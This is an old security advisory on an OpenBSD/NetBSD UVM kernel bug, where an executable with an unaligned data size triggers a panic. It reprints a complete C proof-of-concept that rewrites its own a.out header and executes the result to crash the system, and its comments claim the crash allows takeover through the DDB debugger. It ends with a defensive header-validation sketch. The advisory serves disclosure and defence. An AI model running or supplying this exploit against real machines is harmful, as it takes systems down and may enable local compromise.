5th Nov 2000 [SBWID-139]
COMMAND
	    kernel
SYSTEMS AFFECTED
	    OpenBSD 2.7, NetBSD
PROBLEM
	    An anonymous source found the following.  UVM is a new virtual
	    memory system that is currently used in OpenBSD.  It is
	    significantly better than the traditional Mach-based VM.
	    The bug exists in the anonymous mapping code in UVM.  It allows
	    any local user (or remote user) to crash the entire OpenBSD
	    system, rendering it completely useless.  Once the system has
	    crashed, a local user (with access to the terminal) may in fact
	    hack the system, because the system drops into DDB (see its man
	    page).  DDB allows for debugging of the actual kernel.
	    Basically, if (sz & (PAGE_SIZE-1)) is true, i.e. the size is not
	    a multiple of the page size, the kernel panic()s.  Here is the
	    exploit:
	
	    // PUBLIC RELEASE
	    //
	    // krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG
	    //
	    // This exploit is proof of concept code. It exploits the UVM bug in
	    // all OpenBSD kernels. It can also be used to gain god access via
	    // ddb during the crash recovery phase of OpenBSD's security structure.
	    //
	    // Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP,
	    //         Condemnation, caddis[TESO], Solar Designer, gov-boi,
	    //         #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting)
	    //	   SSG, www.subterrain.net
	    //
	    // PS: The exploit is broke very slightly, so this takes some knowledge
	    //
	    // PUBLIC RELEASE
	    #include <stdio.h>
	    #include <errno.h>
	    #include <stdlib.h>
	    #include <string.h>
	    #include <unistd.h>
	    #include <a.out.h>
	    #include <fcntl.h>
	    #include <sys/types.h>
	    #define CRASH_FILE "./f0rKb0mB"
	    extern int      errno;
	    int
	    main(int argc, char *argv[])
	    {
	        struct exec    *ehdr;
	        struct stat     statbuf;
	        int             fd;
	        unsigned char  *data;

	        fd = open(argv[0], O_RDONLY);
	        if (fd < 0)
	        {
	            perror("main() : open(argv[0]) ");
	            exit(-1);
	        }
	        if (fstat(fd, &statbuf) < 0)
	        {
	            perror("main() : fstat() ");
	            exit(-1);
	        }
	        data = (unsigned char *) malloc(statbuf.st_size);
	        if (data == NULL)
	        {
	            perror("main() : malloc() ");
	            exit(-1);
	        }
	        if (read(fd, data, statbuf.st_size) <= 0)
	        {
	            puts("main() : read() Failure");
	            exit(-1);
	        }
	        ehdr = (struct exec *) data;
	        close(fd);
	        unlink(CRASH_FILE);
	        fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR);
	        if (fd < 0)
	        {
	            perror("main() : open(CRASH_FILE) ");
	            exit(-1);
	        }
	        ehdr->a_data += 3;
	        if (write(fd, data, statbuf.st_size) < 0)
	        {
	            perror("main() : write() ");
	            exit(-1);
	        }
	        close(fd);
	        if (execlp(CRASH_FILE, NULL) < 0)
	        {
	            perror("main() : execlp() ");
	            exit(-1);
	        }
	        return (0);
	    }
	
SOLUTION
	    There is a patch.
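
	    The panic condition above is reached through a size field taken from the executable's header. As an added illustration (not the OpenBSD patch and not code from this advisory), the sketch below checks untrusted header sizes and returns an error to the caller instead of letting an unaligned size reach the mapping code. The `ex_hdr` struct, the `ex_` function names, the 4096-byte page size and the policy of rejecting unaligned text/data sizes are all assumptions.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed page size; the real value is per-architecture. */
#define EX_PAGE_SIZE 4096u
#define EX_PAGE_MASK (EX_PAGE_SIZE - 1u)

/* Hypothetical stand-in for the a.out header size fields. */
struct ex_hdr {
    uint32_t a_text;   /* text segment size, from the file */
    uint32_t a_data;   /* data segment size, from the file */
    uint32_t a_bss;    /* bss size, from the file */
};

/* Round sz up to a page boundary; EOVERFLOW if that would wrap. */
static int ex_round_page(uint32_t sz, uint32_t *out)
{
    if (sz > UINT32_MAX - EX_PAGE_MASK)
        return EOVERFLOW;
    *out = (sz + EX_PAGE_MASK) & ~EX_PAGE_MASK;
    return 0;
}

/* Validate header sizes before any mapping routine sees them.
 * Returns 0 if acceptable, ENOEXEC otherwise (never asserts). */
static int ex_check_hdr(const struct ex_hdr *h)
{
    uint32_t bss;

    if ((h->a_text & EX_PAGE_MASK) || (h->a_data & EX_PAGE_MASK))
        return ENOEXEC;                 /* the sz & (PAGE_SIZE-1) case */
    if (ex_round_page(h->a_bss, &bss) != 0)
        return ENOEXEC;                 /* bss cannot be rounded safely */
    if (h->a_text > UINT32_MAX - h->a_data ||
        h->a_text + h->a_data > UINT32_MAX - bss)
        return ENOEXEC;                 /* total image size would wrap */
    return 0;
}

int main(void)
{
    struct ex_hdr good = { 0x2000, 0x1000, 0x345 };  /* constructed sample */
    struct ex_hdr bad = good;

    bad.a_data += 3;                    /* same header change as the PoC */
    printf("good=%d bad=%d\n", ex_check_hdr(&good), ex_check_hdr(&bad));
    return 0;
}
```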
	
